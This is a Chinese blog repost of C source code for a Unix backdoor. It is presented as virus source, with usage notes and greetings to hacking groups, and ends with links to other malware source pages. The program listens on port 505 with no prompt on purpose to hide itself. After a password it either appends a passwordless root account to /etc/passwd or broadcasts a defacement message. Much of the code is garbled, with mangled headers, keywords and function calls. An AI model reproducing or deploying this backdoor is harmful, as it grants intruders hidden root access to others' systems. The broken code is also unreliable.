【病毒】backdoor病毒源代码
来源:互联网 发布:运营淘宝 编辑:程序博客网 时间:2024/04/29 06:05
--=//backdoor.c//=--
/*
A rip off a sockets tutorial i found somewhere cause I didn't feel like
writing stupid basic sockets code when I had it in my src directory
already.
*/
/* Greets:
Undernet Channels:
#rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
Groups:
The LegionOOT (www.legionoot.cc), Team Sploit
People:
Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,
F-o-X, NeonMaix, Azmodan, & Venomous
/*
Usage (setup):
# gcc -o backdoor backdoor.c
# ./backdoor password &
Usage (using):
telnet to host (port 505) --> type the password (don't wait for a
prompt, there isn't one so its less obvious its a backdoor) -->
type 1or 2. And yes it's _supposed_ to disconnect you after
each command.
*/
#include <sio.h>
#include <slib.h>
#include <errno.h>
#include <sing.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#define PORT 505
#define MAXDATASIZE 100
#define BACKLOG 10
void handle(char *command);
int main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes;
char *bytes;
suct sockaddr_in my_addr;
suct sockaddr_in their_addr;
char buf[MAXDATASIZE];
char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to
send '7h1s b0x 1s 0wn3d' to all people on the box: ";
if (argc != 2) {
fprintf(serr,"Usage: %s password/n", argv[0]);
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (suct sockaddr *)&my_addr, sizeof(suct sockaddr)) == -1)
{
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
while(1) { /* main accept() loop */
sin_size = sizeof(suct sockaddr_in);
if ((new_fd = accept(sockfd, (suct sockaddr *)&their_addr, /
&sin_size)) ==
{
perror("accept");
continue;
}
inet_ntoa(their_addr.sin_addr);
if (!fork()) {
recv(new_fd, buf,
MAXDATASIZE, 0);
bytes = ss(buf, argv[1]);
if (bytes != NULL){
send(new_fd, ask, sizeof(ask), 0);
numbytes=recv(new_fd, buf,
MAXDATASIZE, 0);
buf[numbytes] = '/0';
handle(buf);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child
processes */
}
}
void handle(char *command)
{
FILE *fle;
if(ss(command, "1") != NULL)
{
fle = f0/*n("/etc/passwd", "a*/;
fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
fclose(fle);
}
if(ss(command, "2") != NULL)
{
system("wall 7h1s b0x 1s 0wn3d");
}
}
- 【病毒】backdoor病毒源代码
- backdoor病毒信息
- Backdoor/Afcore病毒
- 关于病毒Backdoor.Gpigeon.uql
- Backdoor.Win32.Rbot病毒防治
- 解决病毒Backdoor.Win32.SdBot.afg(Backdoor.SdBot.kxe)
- 震荡波病毒源代码
- 震荡波病毒源代码
- 震荡波病毒源代码
- 熊猫烧香病毒源代码
- AnnaKournikova病毒源代码解析
- AnnaKournikova病毒源代码解析
- AnnaKournikova病毒源代码解析
- C语言病毒源代码
- AnnaKournikova病毒源代码解析
- AnnaKournikova病毒源代码解析
- AnnaKournikova病毒源代码解析
- 熊猫烧香病毒源代码
- MyEclipse6.0.1注册码生成器(源码)
- 震荡波病毒源代码
- 安装OpenCV笔记 Fedore linux core5
- 跑马灯效果的JavaScript
- 내 사랑 그대 내곁에 있어주오(我的爱,请在我身边)
- 【病毒】backdoor病毒源代码
- Unix时间戳与C# DateTime时间类型互换
- doctype
- C#算术表达式的计算
- 云技术时代,防病毒程序可以省省吗?
- Delphi使用AdoQuery调用Mysql存储过程
- 飞信接口-有时间玩一下
- Tomcat连接到localhost 提示:位于 XDB 的服务器 localhost 要求用户名和密码
- 关于scanf、sscanf和sscanf_s